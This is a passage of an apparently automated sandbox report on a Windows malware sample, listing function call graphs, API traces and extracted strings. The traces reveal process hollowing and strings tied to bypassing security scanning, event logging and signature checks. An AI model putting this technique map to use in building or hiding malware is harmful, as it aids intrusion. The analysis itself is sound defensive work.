                                                                                                                              • Part of subcall function 0298C320: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029E45F0,?,0299E40F,ScanBuffer,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,ScanBuffer,029E4344,029A8FEC,OpenSession), ref: 0298C337
                                                                                                                              • Part of subcall function 0299C4DC: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C5AC), ref: 0299C517
                                                                                                                              • Part of subcall function 0299C4DC: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0299C5AC), ref: 0299C547
                                                                                                                              • Part of subcall function 0299C4DC: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0299C55C
                                                                                                                              • Part of subcall function 0299C4DC: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0299C588
                                                                                                                              • Part of subcall function 0299C4DC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0299C591
                                                                                                                              • Part of subcall function 02987E3C: GetFileAttributesA.KERNEL32(00000000,?,029A1133,ScanString,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,ScanBuffer,029E4344,029A8FEC,ScanString), ref: 02987E47
                                                                                                                              • Part of subcall function 02988004: CreateDirectoryA.KERNEL32(00000000,00000000,?,029A1324,ScanBuffer,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,Initialize,029E4344,029A8FEC,ScanString,029E4344,029A8FEC), ref: 02988011
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$AttributesModuleNamePath$AddressCloseCreateDirectoryHandleInetInformationLibraryLoadName_OfflineOpenProcQueryRead
                                                                                                                            • String ID: .url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$endpointdlp$http$ieproxy$iexpress.exe$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                            • API String ID: 2725267379-582383607
                                                                                                                            • Opcode ID: a4a4b7e7bf25414d11e97e5687f8cebb6f832ed5ad09ed894c57ca30d3d1a7cb
                                                                                                                            • Instruction ID: 5d7c03365745cfb59252762070a42aeb662a1bfa82a7f8d76c61e73a47c6c7fa
                                                                                                                            • Opcode Fuzzy Hash: a4a4b7e7bf25414d11e97e5687f8cebb6f832ed5ad09ed894c57ca30d3d1a7cb
                                                                                                                            • Instruction Fuzzy Hash: EB04FA34A5025ADFDF60FB64D890ADEB3B6BFC9704F1454E5A009AB650DB70AE81CF90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 029A5FA0 Relevance: 142.4, APIs: 3, Strings: 77, Instructions: 2445COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 4522 29a5fa0-29a618a call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 4577 29a6190-29a638f call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 29848b0 4522->4577 4578 29a618b call 2997be8 4522->4578 4637 29a6b54-29a6cd7 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 29848b0 4577->4637 4638 29a6395-29a69b4 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2982ee0 call 2982f08 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 GetCurrentProcess call 2997968 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 4577->4638 4578->4577 4727 29a74a8-29a8b96 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 * 16 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 ExitProcess 4637->4727 4728 29a6cdd-29a6cec call 29848b0 4637->4728 5164 29a69bb-29a6b4f call 29849bc call 299c5bc call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 EnumSystemLocalesA 4638->5164 5165 29a69b6-29a69b9 4638->5165 4728->4727 4736 29a6cf2-29a6fc5 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 299d198 call 2984824 call 2984964 call 2984698 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2987e18 4728->4736 4979 29a6fcb-29a729d call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 299c74c call 29844f4 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984da4 * 2 call 2984728 call 299c3f8 4736->4979 4980 29a72a2-29a74a3 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 29849bc call 2997f48 4736->4980 4979->4980 4980->4727 5164->4637 5165->5164
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02997BE8: LoadLibraryW.KERNEL32(?,00000000,02997C9A), ref: 02997C18
                                                                                                                              • Part of subcall function 02997BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02997C9A), ref: 02997C1E
                                                                                                                              • Part of subcall function 02997BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02997C37
                                                                                                                              • Part of subcall function 02982EE0: QueryPerformanceCounter.KERNEL32 ref: 02982EE4
                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00001000,00000040,ScanBuffer,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,UacScan,029E4344,029A8FEC,ScanBuffer,029E4344,029A8FEC), ref: 029A681D
                                                                                                                              • Part of subcall function 02997968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997975
                                                                                                                              • Part of subcall function 02997968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0299797B
                                                                                                                              • Part of subcall function 02997968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0299799B
                                                                                                                            • EnumSystemLocalesA.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,00000000,ScanBuffer,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,UacScan,029E4344,029A8FEC,ScanBuffer,029E4344,029A8FEC,OpenSession,029E4344), ref: 029A6B4F
                                                                                                                              • Part of subcall function 02987E18: GetFileAttributesA.KERNEL32(00000000,?,0299E0EE,ScanString,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,ScanString,029E4344,029A8FEC,UacScan,029E4344,029A8FEC,UacInitialize), ref: 02987E23
                                                                                                                              • Part of subcall function 0299C3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C4CA), ref: 0299C437
                                                                                                                              • Part of subcall function 0299C3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0299C471
                                                                                                                              • Part of subcall function 0299C3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0299C49E
                                                                                                                              • Part of subcall function 0299C3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0299C4A7
                                                                                                                            • ExitProcess.KERNEL32(00000000,ScanBuffer,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,Initialize,029E4344,029A8FEC,ScanString,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC), ref: 029A8B96
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$AddressHandleModulePathProcProcess$AllocateAttributesCloseCounterCreateCurrentEnumExitLibraryLoadLocalesMemoryNameName_PerformanceQuerySystemVirtualWrite
                                                                                                                            • String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$bcrypt$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                            • API String ID: 724724934-2845693168
                                                                                                                            • Opcode ID: 5b45583b09bea8578b2f0d16edd378443382d8ec9811990ae34a51cf4b9592ff
                                                                                                                            • Instruction ID: 047f7afaad49be69d9249dd4709073306a698abc372d1c076223f1dc82216c26
                                                                                                                            • Opcode Fuzzy Hash: 5b45583b09bea8578b2f0d16edd378443382d8ec9811990ae34a51cf4b9592ff
                                                                                                                            • Instruction Fuzzy Hash: FC33DA35A1025ADFDF20FB64DC909DEB3BABFC9704F5454E5A009AB650DB70AE818F90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02997F48 Relevance: 41.9, APIs: 8, Strings: 15, Instructions: 1602nativethreadprocessCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 8865 2997f48-2997f4b 8866 2997f50-2997f55 8865->8866 8866->8866 8867 2997f57-299803e call 2984954 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 8866->8867 8898 29999ab-2999a15 call 29844c4 * 2 call 2984c24 call 29844c4 call 29844a0 call 29844c4 * 2 8867->8898 8899 2998044-299811f call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 8867->8899 8899->8898 8943 2998125-299844d call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2983098 * 2 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984da4 call 2984db4 CreateProcessAsUserW 8899->8943 9050 299844f-29984bb call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 8943->9050 9051 29984c0-29987e6 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2982ee0 call 2982f08 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 GetThreadContext 8943->9051 9050->9051 9051->8898 9159 29987ec-2998a4f call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 NtReadVirtualMemory 9051->9159 9230 2998d5c-2998dc8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 9159->9230 9231 2998a55-2998bbe call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 NtUnmapViewOfSection 9159->9231 9258 2998dcd-2998f4d call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2997968 9230->9258 9317 2998be8-2998c54 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 9231->9317 9318 2998bc0-2998bdc call 2997968 9231->9318 9258->8898 9362 2998f53-299904c call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2997e58 9258->9362 9326 2998c59-2998d50 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2997968 9317->9326 9323 2998be1-2998be6 9318->9323 9323->9326 9397 2998d55-2998d5a 9326->9397 9411 299904e-299909b call 2997d50 call 2997d44 9362->9411 9412 29990a0-29999a6 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 NtWriteVirtualMemory call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 NtWriteVirtualMemory call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 SetThreadContext NtResumeThread call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2982c2c call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2997ac0 * 3 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2997ac0 * 2 call 2984824 call 2984964 call 29847b0 call 2984964 call 2997ac0 call 2984824 call 2984964 call 29847b0 call 2984964 call 2997ac0 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 9362->9412 9397->9258 9411->9412 9412->8898
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02997BE8: LoadLibraryW.KERNEL32(?,00000000,02997C9A), ref: 02997C18
                                                                                                                              • Part of subcall function 02997BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02997C9A), ref: 02997C1E
                                                                                                                              • Part of subcall function 02997BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02997C37
                                                                                                                            • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029E4398,029E4388,OpenSession,029E4360,02999A30,ScanString,029E4360), ref: 02998446
                                                                                                                            • GetThreadContext.KERNEL32(0000083C,029E43DC,ScanString,029E4360,02999A30,UacInitialize,029E4360,02999A30,ScanBuffer,029E4360,02999A30,ScanBuffer,029E4360,02999A30,UacInitialize,029E4360), ref: 029987DF
                                                                                                                            • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000840,002A4FF8,029E44B0,00000004,029E44B8,ScanBuffer,029E4360,02999A30,ScanString,029E4360,02999A30,Initialize,029E4360,02999A30,UacScan,029E4360), ref: 02998A3C
                                                                                                                            • NtUnmapViewOfSection.N(00000840,00400000,ScanBuffer,029E4360,02999A30,ScanString,029E4360,02999A30,Initialize,029E4360,02999A30,00000840,002A4FF8,029E44B0,00000004,029E44B8), ref: 02998BB7
                                                                                                                              • Part of subcall function 02997968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997975
                                                                                                                              • Part of subcall function 02997968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0299797B
                                                                                                                              • Part of subcall function 02997968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0299799B
                                                                                                                            • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000840,00400000,00000000,1DC8A500,029E44B8,ScanBuffer,029E4360,02999A30,ScanString,029E4360,02999A30,Initialize,029E4360,02999A30,ScanBuffer,029E4360), ref: 0299920B
                                                                                                                            • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000840,002A4FF8,029E44B4,00000004,029E44B8,ScanBuffer,029E4360,02999A30,ScanString,029E4360,02999A30,Initialize,029E4360,02999A30,00000840,00400000), ref: 0299937E
                                                                                                                            • SetThreadContext.KERNEL32(0000083C,029E43DC,ScanBuffer,029E4360,02999A30,ScanString,029E4360,02999A30,Initialize,029E4360,02999A30,00000840,002A4FF8,029E44B4,00000004,029E44B8), ref: 029994F4
                                                                                                                            • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(0000083C,00000000,0000083C,029E43DC,ScanBuffer,029E4360,02999A30,ScanString,029E4360,02999A30,Initialize,029E4360,02999A30,00000840,002A4FF8,029E44B4), ref: 02999501
                                                                                                                              • Part of subcall function 02997AC0: LoadLibraryW.KERNEL32(bcrypt,02999A30,Initialize,029E4360,02999A30,UacScan,029E4360,02999A30,UacInitialize,029E4360,02999A30,0000083C,029E43DC,ScanString,029E4360,02999A30), ref: 02997AD2
                                                                                                                              • Part of subcall function 02997AC0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02997ADF
                                                                                                                              • Part of subcall function 02997AC0: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000840,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,02999A30,Initialize,029E4360,02999A30,UacScan,029E4360,02999A30,UacInitialize), ref: 02997AF6
                                                                                                                              • Part of subcall function 02997AC0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,02999A30,Initialize,029E4360,02999A30,UacScan,029E4360,02999A30,UacInitialize,029E4360,02999A30,0000083C,029E43DC), ref: 02997B05
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
